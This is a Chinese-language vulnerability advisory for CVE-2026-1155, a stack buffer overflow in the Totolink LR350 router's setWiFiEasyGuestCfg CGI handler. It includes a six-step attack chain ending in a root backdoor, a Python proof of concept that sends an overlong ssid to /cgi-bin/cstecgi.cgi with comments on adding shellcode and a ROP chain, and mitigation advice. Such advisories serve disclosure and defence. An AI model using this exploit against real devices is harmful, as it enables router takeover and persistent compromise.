CVE-2026-1155 Totolink LR350 setWiFiEasyGuestCfg缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-1155

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Totolink LR350 9.3.5u.6369_B20220309

漏洞概述

CVE-2026-1155是影响Totolink LR350路由器9.3.5u.6369_B20220309版本的一个高危缓冲区溢出漏洞。该漏洞存在于Web管理界面的CGI接口文件中，具体位于/cgi-bin/cstecgi.cgi的setWiFiEasyGuestCfg函数。攻击者可以通过构造超长的ssid参数值触发缓冲区溢出 conditions，从而覆盖相邻内存区域。由于该漏洞可通过网络远程利用，且只需要低权限认证，攻击门槛相对较低。成功利用此漏洞可能导致设备完全沦陷，攻击者可获得设备的完全控制权，执行任意代码，甚至将恶意固件植入设备。该漏洞已被公开披露并存在在野利用的可能性，对使用受影响版本设备的用户构成严重安全威胁。建议用户立即采取缓解措施并关注厂商更新。

技术细节

该漏洞是一个典型的栈缓冲区溢出问题。在Totolink LR350路由器的Web管理功能中，setWiFiEasyGuestCfg函数负责处理访客WiFi配置参数。函数在处理ssid参数时未对输入长度进行充分验证，直接将用户提供的ssid字符串复制到固定大小的栈缓冲区中。攻击者可以通过发送精心构造的HTTP请求，在ssid参数中注入超长字符串（通常超过256字节），使缓冲区发生溢出。溢出的数据将覆盖栈上的返回地址、保存的帧指针以及其他关键寄存器。当函数执行返回指令时，程序计数器将被控制，攻击者可以劫持程序执行流程。由于该设备采用ARM架构，攻击者需要构造相应的ROP（Return-Oriented Programming）链来绕过栈保护机制（如ASLR、DEP）。攻击者通常会先发送小部分数据定位溢出点，再构造包含shellcode或ROP gadgets的完整payload，最终实现远程代码执行或建立持久化后门。

攻击链分析

STEP 1

步骤1

扫描目标网络，发现运行受影响版本固件的Totolink LR350路由器

STEP 2

步骤2

通过Web管理界面或API接口获取低权限账户访问权限

STEP 3

步骤3

构造包含超长ssid参数的恶意HTTP POST请求到/cgi-bin/cstecgi.cgi

STEP 4

步骤4

发送精心设计的缓冲区溢出payload，覆盖栈内存中的返回地址

STEP 5

步骤5

通过ROP链绕过安全防护，执行shellcode获取设备root权限

STEP 6

步骤6

建立持久化后门，可执行任意命令或植入恶意固件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib3
urllib3.disable_warnings()

target_ip = '192.168.10.1'
target_port = 443

# Generate payload with 300+ bytes to trigger overflow
# Pattern to identify offset: cyclic pattern or long string
ssid_payload = 'A' * 300

# Build the exploit request
url = f'https://{target_ip}:{target_port}/cgi-bin/cstecgi.cgi'

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Referer': f'https://{target_ip}/',
}

data = {
    'topicurl': 'setWiFiEasyGuestCfg',
    'ssid': ssid_payload,
    'encryption': 'wpapsk',
    'pwd': 'guest1234',
    'enable': '1'
}

try:
    response = requests.post(url, data=data, headers=headers, verify=False, timeout=10)
    print(f'Status Code: {response.status_code}')
    print(f'Response: {response.text}')
except requests.exceptions.RequestException as e:
    print(f'Request failed: {e}')

# Note: For actual exploitation, replace 'A'*300 with:
# 1. NOP sled
# 2. Shellcode/ROP chain
# 3. Return address pointing to shellcode

影响范围

Totolink LR350 9.3.5u.6369_B20220309

防御指南

临时缓解措施

立即禁用路由器的远程管理功能，仅允许通过本地局域网访问Web管理界面。将Web管理端口从公网隔离，确保攻击者无法直接从互联网发起攻击。同时，监控设备日志关注异常CGI请求。如无法立即升级固件，应考虑替换为不受影响的其他型号设备，并在边界防火墙处阻断对路由器管理端口的访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1155
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1155
3 Details https://www.cvedetails.com/cve/CVE-2026-1155/
4 VulDB https://vuldb.com/cve/CVE-2026-1155
5 Link https://lavender-bicycle-a5a.notion.site/TOTOLINK-LR350-setWiFiEasyGuestCfg-2e453a41781f8034bae3d1a11066a8fb?source=copy_link
6 Link https://vuldb.com/?ctiid.341749
7 Link https://vuldb.com/?id.341749
8 Link https://vuldb.com/?submit.735718
9 Link https://www.totolink.net/